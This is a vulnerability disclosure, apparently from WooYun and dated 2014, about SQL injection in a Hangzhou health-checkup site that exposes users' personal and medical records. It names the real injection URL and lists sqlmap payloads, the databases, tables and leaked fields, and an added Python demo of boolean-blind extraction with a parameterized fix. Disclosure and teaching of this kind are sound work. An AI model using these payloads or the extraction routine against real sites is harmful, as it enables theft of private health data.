2014-09-16: Details reported to the vendor, awaiting vendor handling
2014-09-21: Vendor confirmed; details disclosed to the vendor only
2014-10-01: Details disclosed to core white hats and domain experts
2014-10-11: Details disclosed to regular white hats
2014-10-21: Details disclosed to intern white hats
2014-10-31: Details disclosed to the public
Leaks users' age, sex, address, date of birth, telephone, email, height, weight and a whole series of other medical-checkup information.
WooYun: The largest physical-examination organization in Hangzhou allows enumerating every user's checkup report (云健康, http://ysjk.jiankang.cn/)
Physical examination center
Input: '
Input: and 1=1
Injection point: http://ysjk.jiankang.cn/?act=mec&id=60
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=mec&id=60 AND 7419=7419

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: act=mec&id=60 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716e736171,0x4b4e7379494577565262,0x7170696f71),NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=mec&id=60 AND SLEEP(5)
---
[12:48:32] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
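The three signals sqlmap reports above (a syntax error on a stray quote, a boolean oracle on `AND 7419=7419`, and an 11-column UNION channel) all come from one root cause: the numeric `id` parameter is concatenated straight into the SQL string. The Python below is an added example and is not code from the report or from the jiankang.cn application. It reproduces the pattern offline against an in-memory SQLite table with a made-up `member_info` schema and constructed rows; the function names, schema and data are assumptions, the real backend is MySQL, and SQLite's `unicode()`/`substr()` stand in for MySQL's `ASCII()`/`SUBSTRING()`. It also decodes the hex literals in sqlmap's `CONCAT(...)` payload, which are just ASCII delimiters around a random token that sqlmap searches for in the response.

```python
import sqlite3

# Constructed sample rows (hypothetical schema; the real member_info table is
# known only through the column names listed in the report).
SAMPLE_ROWS = [
    (60, "Zhang", "Hangzhou", 172, 65),
    (61, "Li", "Hangzhou", 160, 50),
]

COLUMNS = "id, name, city, height, weight"


def make_db():
    """In-memory SQLite database standing in for the site's MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE member_info (id INTEGER PRIMARY KEY, name TEXT, "
        "city TEXT, height INTEGER, weight INTEGER)"
    )
    conn.executemany("INSERT INTO member_info VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, id_param):
    """The pattern behind ?act=mec&id=: the raw parameter is concatenated into SQL."""
    sql = f"SELECT {COLUMNS} FROM member_info WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, id_param):
    """Hardened version: validate the parameter as an integer, then bind it."""
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    sql = f"SELECT {COLUMNS} FROM member_info WHERE id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


def probe_error(conn, id_param):
    """First step of the report: a stray quote breaks the SQL and the server errors."""
    try:
        vulnerable_lookup(conn, id_param)
        return False
    except sqlite3.OperationalError:
        return True


def decode_sqlmap_marker(*hex_literals):
    """sqlmap's CONCAT(0x..., 0x..., 0x...) payload is hex-encoded ASCII: two
    delimiters around a random token it then looks for in the page body."""
    return "".join(bytes.fromhex(h[2:]).decode("ascii") for h in hex_literals)


def blind_extract(conn, subquery, max_len=32):
    """Boolean-based blind extraction through vulnerable_lookup(): each character
    is found by binary search on its code point (seven requests per character).
    SQLite's unicode()/substr() stand in for MySQL's ASCII()/SUBSTRING()."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"
            # Row 60 comes back only when the appended condition is true.
            if vulnerable_lookup(conn, f"60 AND {cond}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() is '' and unicode('') is NULL
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("error on quote:", probe_error(db, "60'"))
    print("AND 1=1:", vulnerable_lookup(db, "60 AND 1=1"))
    print("AND 1=2:", vulnerable_lookup(db, "60 AND 1=2"))
    print("sqlmap marker:", decode_sqlmap_marker("0x716e736171", "0x4b4e7379494577565262", "0x7170696f71"))
    print("blind extract:", blind_extract(db, "SELECT name FROM member_info WHERE id = 61"))
    print("safe lookup with payload:", safe_lookup(db, "60 AND 1=1"))
```

The fix is the whole of `safe_lookup()`: with the value bound as a parameter (and, for an `id`, validated as an integer first) none of the three channels exists, because the payload is never parsed as SQL. A UNION payload works against `vulnerable_lookup()` as well, provided its column count matches the five columns of the constructed query, just as sqlmap had to find 11 columns against the real endpoint.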
Databases
available databases [19]:
[*] 114_jiankang_cn
[*] bak_hzhailiao_com
[*] bak_hzhailiao_jiankang_cn
[*] bak_icare_jiankang_cn
[*] book_jiankang_cn
[*] bs_tjxt_scfb
[*] cn_jiankang
[*] equipments
[*] hzhailiao_com
[*] hzhailiao_jiankang_cn
[*] hzhailiao_jiankang_cn_bak
[*] hzlyy_com
[*] icare_jiankang_cn
[*] information_schema
[*] lyy_jiankang_cn
[*] mysql
[*] report_hzhailiao
[*] yls0804
[*] ylscn_jiankang
Taking one of the databases as an example, the tables in hzlyy_com:
Database: hzlyy_com
[64 tables]
+--------------------------+
| ---check_to expert       |
| ---member_info2          |
| member_info2012-10-12    |
| tj_tjdjb2012-10-12       |
| announcement             |
| check_category           |
| check_category_items     |
| check_items              |
| check_reserve_days       |
| check_yuyue              |
| check_yuyue_items        |
| company                  |
| company_check_category   |
| company_department       |
| company_personnel        |
| company_personnel_cancel |
| feedback                 |
| goods                    |
| goods_cart               |
| goods_order              |
| goods_order_as           |
| header                   |
| meal                     |
| member                   |
| member_email_auth        |
| member_forget            |
| member_info              |
| member_login_change      |
| member_login_log         |
| member_mobile_auth       |
| member_passwd_change     |
| member_to_check          |
| member_to_device         |
| member_to_groups         |
| member_to_tags           |
| message                  |
| message_as               |
| message_old              |
| minfo_func               |
| minfo_groups             |
| minfo_groups_func        |
| minfo_priv               |
| minfo_to_groups          |
| mobile_sms               |
| mobile_sms_mass          |
| music                    |
| sports                   |
| tags                     |
| task                     |
| tj_gzry                  |
| tj_hydwdmb               |
| tj_hydwdmb_20120725      |
| tj_personnel             |
| tj_personnel_tjbh        |
| tj_sequences             |
| tj_tjdjb                 |
| tj_tjjlb                 |
| tj_tjjlmxb               |
| tj_tjxmb                 |
| tj_zhxm_hd               |
| vip_card                 |
| vip_card_consumption     |
| weight_foods             |
| weight_sports_days       |
+--------------------------+
The following fields are leaked:
address, allowance, belong_uid, birthday, category, city, company, company_department_name, company_id, email, email_flag, expert_id, expert_name, face, hastype, height, id, id_number, intro, marry, message_new, mobile, mobile_flag, mobile_remind, money, name, post, province, remark, runstridelength, sex, stridelength, type, uid, weight, xdview_flag
This is just one example.
Severity: High
Vulnerability Rank: 11
Confirmed at: 2014-09-21 10:02
None yet
Can the bug reporter look up people's measurements?
@疯狗 Probably, but I can't fully read the pinyin above.
@浮萍 I sold a kidney last time, wonder if that can be looked up.
@Mosuan We're a legitimate organization.